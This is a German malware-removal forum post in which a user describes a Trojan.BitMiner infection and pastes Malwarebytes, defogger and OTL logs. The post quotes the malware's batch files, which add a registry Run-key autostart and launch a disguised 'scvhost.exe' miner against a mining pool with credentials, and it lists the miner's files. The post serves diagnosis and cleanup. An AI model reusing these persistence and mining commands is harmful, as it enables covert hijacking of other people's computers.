Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe"
Hallo,
aufgefallen das etwas nicht stimmen könnte ist mir das erste mal, als nach einem Start von Windows 7 ein DOS Fenster mit der Titelleiste "C:\Windows\system32\cmd.exe" und als einzige Zeile im Fenster "Der Vorgang wurde erfolgreich ausgeführt" auftauchte.
Malwarebytes Anti-Malware hat dann folgende Datei als infiziert befunden und unter Quarantäne gestellt:
"C:\Users\***\AppDate\Roaming\pejo\scvhost.exe"
Hier das log von der Schnellsuche welche das als Ergebnis hatte: Code:
Malwarebytes' Anti-Malware 1.51.2.1300
www.malwarebytes.org
Datenbank Version: 913060202
Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421
02.06.2013 14:56:57
mbam-log-2013-06-02 (14-56-57).txt
Art des Suchlaufs: Quick-Scan
Durchsuchte Objekte: 220542
Laufzeit: 7 Minute(n), 40 Sekunde(n)
Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschl¸ssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 1
Infizierte Speicherprozesse:
(Keine bˆsartigen Objekte gefunden)
Infizierte Speichermodule:
(Keine bˆsartigen Objekte gefunden)
Infizierte Registrierungsschl¸ssel:
(Keine bˆsartigen Objekte gefunden)
Infizierte Registrierungswerte:
(Keine bˆsartigen Objekte gefunden)
Infizierte Dateiobjekte der Registrierung:
(Keine bˆsartigen Objekte gefunden)
Infizierte Verzeichnisse:
(Keine bˆsartigen Objekte gefunden)
Infizierte Dateien:
c:\Users\ant\AppData\Roaming\pejo\scvhost.exe (Trojan.BitMiner) -> Quarantined and deleted successfully.
Nach dem Neustart öffnete sich das DOS-Fenster jedoch erneut, weshalb ich mir den Systemstart Tab in msconfig angeschauen habe. Aus irgendeinem Grund fand ich den Eintrag "C:\Users\***\AppData\Roaming\pejo\vifier.bat" merkwürdig und versuchte ein wenig nachzuforschen. Über Google fand ich nicht wirklich viele Informationen dazu, außer das es wohl eventuell mit einem Bundes Trojaner zu tun haben könnte!? Oder vielleicht doch nur einen "Bitcoin miner"!?
Ein vollständiger Scan mit Malwarebytes ergab aber kein Ergebnis mehr: Code:
Malwarebytes' Anti-Malware 1.51.2.1300
www.malwarebytes.org
Datenbank Version: 913060202
Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421
02.06.2013 16:45:22
mbam-log-2013-06-02 (16-45-22).txt
Art des Suchlaufs: Vollst‰ndiger Suchlauf (C:\|)
Durchsuchte Objekte: 358343
Laufzeit: 1 Stunde(n), 21 Minute(n), 45 Sekunde(n)
Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschl¸ssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 0
Infizierte Speicherprozesse:
(Keine bˆsartigen Objekte gefunden)
Infizierte Speichermodule:
(Keine bˆsartigen Objekte gefunden)
Infizierte Registrierungsschl¸ssel:
(Keine bˆsartigen Objekte gefunden)
Infizierte Registrierungswerte:
(Keine bˆsartigen Objekte gefunden)
Infizierte Dateiobjekte der Registrierung:
(Keine bˆsartigen Objekte gefunden)
Infizierte Verzeichnisse:
(Keine bˆsartigen Objekte gefunden)
Infizierte Dateien:
(Keine bˆsartigen Objekte gefunden)
Also hab ich mir die .bat mal selbst angeschaut:
*\pejo\vifier.bat: Code:
@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v pejo /d "\"%appdata%\pejo\vifier.bat\"" /f
cd "%appdata%\pejo\"
chp cmd /c ""%appdata%\pejo\1.bat""
*\pejo\1.bat: Code:
scvhost.exe -o hxxp://us1.eclipsemc.com:8337 -u melody_6 -p pavlaka -k diablo
Da die infizierte scvhost.exe in der 1.bat erwähnt wurde, nehme ich nun an dass dieses pejo-Verzeichnis was mit der ganzen Sachen zu tun hat... Hier die Liste der Dateien im Verzeichnis: Code:
1.bat
API.class
chp.exe
diablo121016.cl
diakgcn121016.cl
libblkmaker-jansson-0.1-0.dll
libblkmaker-0.1-0.dll
libcurl-4.dll
libjansson-4.dll
libusb-1.0.dll
miner.php
pdcurses.dll
phatk121016.cl
poclbm121016.cl
pthreadGC2.dll
scrypt121016.cl
vifier.bat
zlib1.dll
Hier mal die Log/TXT-Daten der Programme aus eurer Antleitung:
defogger: Code:
defogger_disable by jpshortstuff (23.02.10.1)
Log created at 17:09 on 02/06/2013 (***)
Checking for autostart values...
HKCU\~\Run values retrieved.
HKLM\~\Run values retrieved.
Checking for services/drivers...
Unable to read sptd.sys
SPTD -> Disabled (Service running -> reboot required)
-=E.O.F=-
OTL.txt: Code:
OTL logfile created on: 02.06.2013 17:24:00 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ant\Desktop
Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
3,00 Gb Total Physical Memory | 1,99 Gb Available Physical Memory | 66,28% Memory free
6,19 Gb Paging File | 5,21 Gb Available in Paging File | 84,05% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 111,57 Gb Total Space | 15,15 Gb Free Space | 13,58% Space Free | Partition Type: NTFS
Drive D: | 111,55 Gb Total Space | 35,46 Gb Free Space | 31,79% Space Free | Partition Type: NTFS
Drive G: | 1,86 Gb Total Space | 0,02 Gb Free Space | 1,00% Space Free | Partition Type: FAT
Computer Name: ANT-PC | User Name: ant | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
========== Processes (SafeList) ==========
PRC - [2013.06.02 17:02:10 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ant\Desktop\OTL.exe
PRC - [2013.03.06 15:43:20 | 002,088,960 | ---- | M] (Bdrive Inc.) -- C:\Program Files\NetDrive\ndsvc.exe
PRC - [2012.08.01 10:23:39 | 000,348,664 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
PRC - [2012.07.09 20:51:26 | 001,672,008 | ---- | M] () -- C:\Program Files\Twonky\TwonkyServer\twonkyserver.exe
PRC - [2012.07.09 20:51:02 | 000,545,608 | ---- | M] () -- C:\Program Files\Twonky\TwonkyServer\twonkyproxy.exe
PRC - [2012.07.09 20:50:58 | 000,271,176 | ---- | M] () -- C:\Program Files\Twonky\TwonkyServer\twonkywebdav.exe
PRC - [2012.07.09 20:50:56 | 000,549,704 | ---- | M] (PacketVideo) -- C:\Program Files\Twonky\TwonkyServer\twonkystarter.exe
PRC - [2012.05.09 07:18:43 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\sched.exe
PRC - [2012.05.09 07:18:42 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\avguard.exe
PRC - [2012.05.09 07:18:42 | 000,080,336 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
PRC - [2011.08.31 17:00:48 | 000,366,152 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
PRC - [2011.02.25 11:46:22 | 000,249,648 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft\BingBar\SeaPort.EXE
PRC - [2010.06.17 05:23:34 | 000,140,224 | ---- | M] (Advanced Micro Devices) -- C:\Program Files\ATI Technologies\ATI.ACE\Reservation Manager\AMD Reservation Manager.exe
PRC - [2009.10.09 13:11:19 | 000,389,120 | R--- | M] () -- C:\Program Files\Common Files\AVerMedia\Service\AVerScheduleService.exe
PRC - [2009.04.11 08:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe
PRC - [2009.04.08 13:49:30 | 000,344,064 | R--- | M] (AVerMedia) -- C:\Program Files\Common Files\AVerMedia\Service\AVerRemote.exe
PRC - [2008.06.10 18:40:06 | 000,131,072 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eNet\eNet Service.exe
PRC - [2008.01.03 02:55:52 | 000,506,416 | ---- | M] (Egis Incorporated) -- C:\Acer\Empowering Technology\eDataSecurity\x86\eDSService.exe
PRC - [2007.11.27 19:54:36 | 000,110,592 | ---- | M] () -- C:\Acer\Mobility Center\MobilityService.exe
PRC - [2007.10.01 17:42:36 | 000,024,576 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eLock\Service\eLockServ.exe
PRC - [2007.09.20 14:57:28 | 000,167,936 | ---- | M] (acer) -- C:\Acer\Empowering Technology\ePower\ePowerSvc.exe
PRC - [2007.09.10 16:28:18 | 000,057,344 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe
PRC - [2007.09.07 21:35:10 | 000,102,400 | ---- | M] (Synaptics, Inc.) -- C:\Program Files\Synaptics\SynTP\SynTPStart.exe
========== Modules (No Company Name) ==========
MOD - [2011.06.24 22:56:36 | 000,087,328 | ---- | M] () -- C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2011.06.24 22:56:14 | 001,241,888 | ---- | M] () -- C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2010.03.15 11:28:22 | 000,141,824 | ---- | M] () -- C:\Program Files\WinRAR\RarExt.dll
MOD - [2008.03.10 08:01:06 | 000,159,744 | ---- | M] () -- C:\Windows\System32\atitmmxx.dll
========== Services (SafeList) ==========
SRV - [2013.05.14 21:03:15 | 000,256,904 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2013.03.06 15:43:20 | 002,088,960 | ---- | M] (Bdrive Inc.) [Auto | Running] -- C:\Program Files\NetDrive\ndsvc.exe -- (ndsvc)
SRV - [2012.07.13 13:28:36 | 000,160,944 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2012.07.09 20:51:02 | 000,545,608 | ---- | M] () [Auto | Running] -- C:\Program Files\Twonky\TwonkyServer\twonkyproxy.exe -- (TwonkyProxy)
SRV - [2012.07.09 20:50:58 | 000,271,176 | ---- | M] () [Auto | Running] -- C:\Program Files\Twonky\TwonkyServer\twonkywebdav.exe -- (TwonkyWebDav)
SRV - [2012.07.09 20:50:56 | 000,549,704 | ---- | M] (PacketVideo) [Auto | Running] -- C:\Program Files\Twonky\TwonkyServer\twonkystarter.exe -- (TwonkyServer)
SRV - [2012.05.09 07:18:43 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Program Files\Avira\AntiVir Desktop\sched.exe -- (AntiVirSchedulerService)
SRV - [2012.05.09 07:18:42 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Program Files\Avira\AntiVir Desktop\avguard.exe -- (AntiVirService)
SRV - [2011.08.31 17:00:48 | 000,366,152 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService)
SRV - [2011.08.13 01:56:34 | 000,411,432 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2011.02.28 19:44:14 | 000,183,560 | ---- | M] (Microsoft Corporation.) [On_Demand | Stopped] -- C:\Program Files\Microsoft\BingBar\BBSvc.EXE -- (BBSvc)
SRV - [2011.02.25 11:46:22 | 000,249,648 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft\BingBar\SeaPort.EXE -- (SeaPort)
SRV - [2011.01.26 18:00:16 | 000,284,672 | ---- | M] (Advanced Micro Devices, Inc.) [Auto | Stopped] -- C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe -- (AMD FUEL Service)
SRV - [2010.06.17 05:23:34 | 000,140,224 | ---- | M] (Advanced Micro Devices) [Auto | Running] -- C:\Program Files\ATI Technologies\ATI.ACE\Reservation Manager\AMD Reservation Manager.exe -- (AMD Reservation Manager)
SRV - [2009.10.09 13:11:19 | 000,389,120 | R--- | M] () [Auto | Running] -- C:\Program Files\Common Files\AVerMedia\Service\AVerScheduleService.exe -- (AVerScheduleService)
SRV - [2009.04.08 13:49:30 | 000,344,064 | R--- | M] (AVerMedia) [Auto | Running] -- C:\Program Files\Common Files\AVerMedia\Service\AVerRemote.exe -- (AVerRemote)
SRV - [2008.06.10 18:40:06 | 000,131,072 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eNet\eNet Service.exe -- (eNet Service)
SRV - [2008.01.21 04:23:32 | 000,272,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV - [2008.01.03 02:55:52 | 000,506,416 | ---- | M] (Egis Incorporated) [Auto | Running] -- C:\Acer\Empowering Technology\eDataSecurity\x86\eDSService.exe -- (eDataSecurity Service)
SRV - [2007.12.19 19:09:22 | 000,024,576 | ---- | M] () [Auto | Stopped] -- C:\Acer\Empowering Technology\eSettings\Service\capuserv.exe -- (eSettingsService)
SRV - [2007.11.27 19:54:36 | 000,110,592 | ---- | M] () [Auto | Running] -- C:\Acer\Mobility Center\MobilityService.exe -- (MobilityService)
SRV - [2007.10.01 17:42:36 | 000,024,576 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eLock\Service\eLockServ.exe -- (eLockService)
SRV - [2007.09.20 14:57:28 | 000,167,936 | ---- | M] (acer) [Auto | Running] -- C:\Acer\Empowering Technology\ePower\ePowerSvc.exe -- (WMIService)
SRV - [2007.09.10 16:28:18 | 000,057,344 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe -- (eRecoveryService)
========== Driver Services (SafeList) ==========
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkfwd.sys -- (NwlnkFwd)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkflt.sys -- (NwlnkFlt)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ipinip.sys -- (IpInIp)
DRV - [2013.03.06 15:43:15 | 000,048,352 | ---- | M] (Bdrive Inc.) [File_System | On_Demand | Running] -- C:\Program Files\NetDrive\NDFS.sys -- (ndfs)
DRV - [2012.09.19 11:02:06 | 000,181,344 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ssudmdm.sys -- (ssudmdm)
DRV - [2012.07.30 13:32:08 | 000,083,168 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ssudbus.sys -- (dg_ssudbus)
DRV - [2012.05.09 07:18:43 | 000,137,928 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avipbb.sys -- (avipbb)
DRV - [2012.05.09 07:18:43 | 000,083,392 | ---- | M] (Avira GmbH) [File_System | Auto | Running] -- C:\Windows\System32\drivers\avgntflt.sys -- (avgntflt)
DRV - [2011.10.19 17:56:15 | 000,036,000 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avkmgr.sys -- (avkmgr)
DRV - [2011.08.31 17:00:50 | 000,022,216 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\System32\drivers\mbam.sys -- (MBAMProtector)
DRV - [2010.11.21 17:30:51 | 000,691,696 | ---- | M] (Duplex Secure Ltd.) [Kernel | Disabled | Stopped] -- C:\Windows\System32\drivers\sptd.sys -- (sptd)
DRV - [2010.06.17 16:14:27 | 000,028,520 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\ssmdrv.sys -- (ssmdrv)
DRV - [2010.02.18 09:18:22 | 000,037,944 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\amdiox86.sys -- (amdiox86)
DRV - [2009.10.19 04:26:08 | 000,474,880 | ---- | M] (AVerMedia TECHNOLOGIES, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\AVerAF35.sys -- (AVerAF35)
DRV - [2008.11.19 17:09:08 | 000,013,056 | ---- | M] (LG Electronics Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\lgusbbus.sys -- (usbbus)
DRV - [2008.03.10 08:58:40 | 003,533,824 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\atikmdag.sys -- (atikmdag)
DRV - [2008.01.21 04:23:21 | 000,016,896 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\WSDPrint.sys -- (WSDPrintDevice)
DRV - [2007.07.03 11:05:20 | 000,015,392 | ---- | M] (Acer, Inc.) [Kernel | Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\int15.sys -- (int15)
DRV - [2007.04.03 20:04:28 | 000,039,680 | ---- | M] (O2Micro ) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\o2media.sys -- (O2MDRDR)
DRV - [2007.04.03 02:11:08 | 000,035,712 | ---- | M] (O2Micro ) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\o2sd.sys -- (O2SDRDR)
DRV - [2006.11.29 02:44:52 | 000,008,192 | ---- | M] (Conexant Systems, Inc.) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\XAudio.sys -- (XAudio)
DRV - [2006.10.30 21:23:12 | 000,007,680 | ---- | M] (ATI Technologies Inc.) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\AtiPcie.sys -- (AtiPcie)
DRV - [2006.04.07 17:06:38 | 000,038,496 | ---- | M] (OLYMPUS IMAGING CORP.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\VNUSB.sys -- (VNUSB)
DRV - [2005.10.31 12:28:04 | 000,015,616 | ---- | M] (WideView Technology Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ECS_Loader_220.sys -- (ECS_Loader_220)
========== Standard Registry (SafeList) ==========
========== Internet Explorer ==========
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&s=2&o=vp32&d=0309&m=travelmate_5520
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&s=2&o=vp32&d=0309&m=travelmate_5520
IE - HKLM\..\SearchScopes,DefaultScope = {67A2568C-7A0A-4EED-AECC-B5405DE63B64}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{67A2568C-7A0A-4EED-AECC-B5405DE63B64}: "URL" = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://go.web.de/home
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://go.web.de/tab2 [binary data]
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SearchDefaultBranded = 1
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://de.msn.com/?ocid=iehp
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = de
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 33 0B F0 16 3E C2 CA 01 [binary data]
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1
IE - HKCU\..\SearchScopes,DefaultScope = {67A2568C-7A0A-4EED-AECC-B5405DE63B64}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKCU\..\SearchScopes\{111F1281-BDAA-4B8D-9AF9-8BB376A8BDED}: "URL" = hxxp://www.bing.com/search?FORM=IEFM1&q={searchTerms}&src={referrer:source?}
IE - HKCU\..\SearchScopes\{4A9BB00F-DA96-4E4D-A9CF-45117AB9D4D2}: "URL" = hxxp://go.web.de/suchbox/smartshopping/?searchText={searchTerms}&mc=searchplugin@suche@msie.suche@preisvergleich
IE - HKCU\..\SearchScopes\{66227E65-9D58-4B37-87EC-09E6BF4C24AB}: "URL" = hxxp://go.web.de/suchbox/ebay?query={searchTerms}
IE - HKCU\..\SearchScopes\{67A2568C-7A0A-4EED-AECC-B5405DE63B64}: "URL" = hxxp://go.web.de/suchbox/google?q={searchTerms}&rlz=1I7ADRA_de
IE - HKCU\..\SearchScopes\{84EE36C5-9201-46D0-A633-5CFCE7FF6552}: "URL" = hxxp://suche.gmx.net/search/web/?su={searchTerms}&mc=searchplugin@suche@msie.suche@web&origin=searchplugin
IE - HKCU\..\SearchScopes\{96C8FC5C-438D-405E-BC5E-8F7F45AA3BCA}: "URL" = hxxp://go.1und1.de/suchbox/amazon?tag=1und1icon-21&field-keywords={searchTerms}
IE - HKCU\..\SearchScopes\{ADDF20CC-BACE-48CB-A300-6C29BFE0E987}: "URL" = hxxp://suche.web.de/search/web/?su={searchTerms}&mc=searchplugin@suche@msie.suche@web&origin=searchplugin
IE - HKCU\..\SearchScopes\{C1BF8F08-E17F-4955-840D-D97E1187C1D3}: "URL" = hxxp://de.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&type=971163&p={searchTerms}
IE - HKCU\..\SearchScopes\{C821A797-ED91-43F3-A1FF-3BE6E0F679A4}: "URL" = hxxp://go.1und1.de/suchbox/1und1suche?su={searchTerms}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local;<local>
========== FireFox ==========
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX,Inc.)
FF - HKLM\Software\MozillaPlugins\@google.com/npPicasa3,version=3.0.0: C:\Program Files\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeLive,version=1.5: C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.21.145\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.21.145\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 2.0.0.24\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2012.05.21 20:28:48 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 2.0.0.24\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins [2013.05.19 09:30:22 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Thunderbird\Extensions\\eplgTb@eset.com: C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{8A9386B4-E958-4c4c-ADF4-8F26DB3E4829}: C:\Program Files\PriceGong\2.6.11\FF [2013.05.15 20:53:03 | 000,000,000 | ---D | M]
========== Chrome ==========
CHR - homepage: hxxp://www.google.com/
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:acceptedSuggestion}{google:originalQueryForSuggestion}{google:searchFieldtrialParameter}sourceid=chrome&ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&hl={language}&q={searchTerms}
CHR - homepage: hxxp://www.google.com/
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\PepperFlash\pepflashplayer.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\gcswf32.dll
CHR - plugin: Remoting Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\pdf.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll
CHR - plugin: Java Deployment Toolkit 6.0.210.7 (Enabled) = C:\Program Files\Java\jre6\bin\new_plugin\npdeployJava1.dll
CHR - plugin: Java(TM) Platform SE 6 U21 (Enabled) = C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll
CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin.dll
CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin2.dll
CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin3.dll
CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin4.dll
CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin5.dll
CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin6.dll
CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin7.dll
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL
CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL
CHR - plugin: Microsoft Office Live Plug-in for Firefox (Enabled) = C:\Program Files\Microsoft\Office Live\npOLW.dll
CHR - plugin: DivX Web Player (Enabled) = C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll
CHR - plugin: Picasa (Enabled) = C:\Program Files\Google\Picasa3\npPicasa3.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll
CHR - plugin: Silverlight Plug-In (Enabled) = C:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll
CHR - plugin: iTunes Application Detector (Enabled) = C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll
CHR - plugin: Windows Presentation Foundation (Enabled) = C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll
O1 HOSTS File: ([2006.09.18 23:41:30 | 000,000,761 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - No CLSID value found.
O2 - BHO: (PriceGong - Price Comparison) - {1631550F-191D-4826-B069-D9439253D926} - C:\Program Files\PriceGong\2.6.11\PriceGongIE.dll (PriceGong)
